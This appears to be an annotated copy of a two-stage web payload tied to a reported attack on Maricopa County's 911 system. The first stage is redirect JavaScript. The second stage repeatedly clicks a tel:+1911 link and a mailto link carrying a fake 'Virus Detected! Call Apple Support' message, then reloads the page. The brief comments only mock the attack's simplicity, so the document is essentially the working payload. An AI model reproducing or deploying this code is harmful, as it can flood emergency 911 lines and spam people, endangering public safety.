payload from meetdesai.com/ipas

1. <!-- Maricopa County Sheriff's Office calls this a sophisticated cyber attack:
2.      http://www.abc15.com/news/region-phoenix-metro/central-phoenix/mcso-arrests-suspect-in-911-cyber-attack
3.  
4.      This is not a sophisticated cyber attack. -->
5.  
6. <!-- Stage 1: payload from meetdesai.com/ipas
7.      this is the initial page which forwards the user to a second stage with a strange URL -->
8. <script>window.googleJavaScriptRedirect=1</script>
9. <script>
10.   var n={
11.     navigateTo:function(b,a,d){
12.         if(b!=a&&b.google){
13.            if(b.google.r){
14.                b.google.r=0;
15.                 b.location.href=d;
16.                 a.location.replace("about:blank");
17.             }
18.         } else {
19.             a.location.replace(d);
20.         }
21.     }
22.   };
23.   n.navigateTo(window.parent,window,"http://meetdesai.com/ipas/+\x26cd\x3d2\x26hl\x3den\x26ct\x3dclnk\x26gl\x3dus");
24. </script>
25. <noscript>
26.   <META http-equiv="refresh" content="0;URL='http://meetdesai.com/ipas/+&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us'">
27. </noscript>
28. <!-- end Stage 1 -->
29.  
30.  
31. <!-- Stage 2: payload from meetdesai.com/ipas/+&cd=2&hl=en&ct=clnk&gl=us
32.     this is the stage that either calls folks, or opens mails to desai, or both. -->
33. <h1>LOLOLOLOLOLOLOL</h1>
34. <a href="tel:+1911" id="tel"></a>
35. <a href="mailto:meets_desai@Yahoo.com?subject=Virus Detected!&body=We detected a Virus on your device! Call Apple Support now!" id="mail"></a>
36.  
37. <script>
38.   for(i=0;i<10100101010010101001010100101001010;++i){
39.    document.getElementById("tel").click(); document.getElementById("mail").click();
40.    window.location = window.location;
41.  }
42. </script>
43. <!-- end Stage 2 -->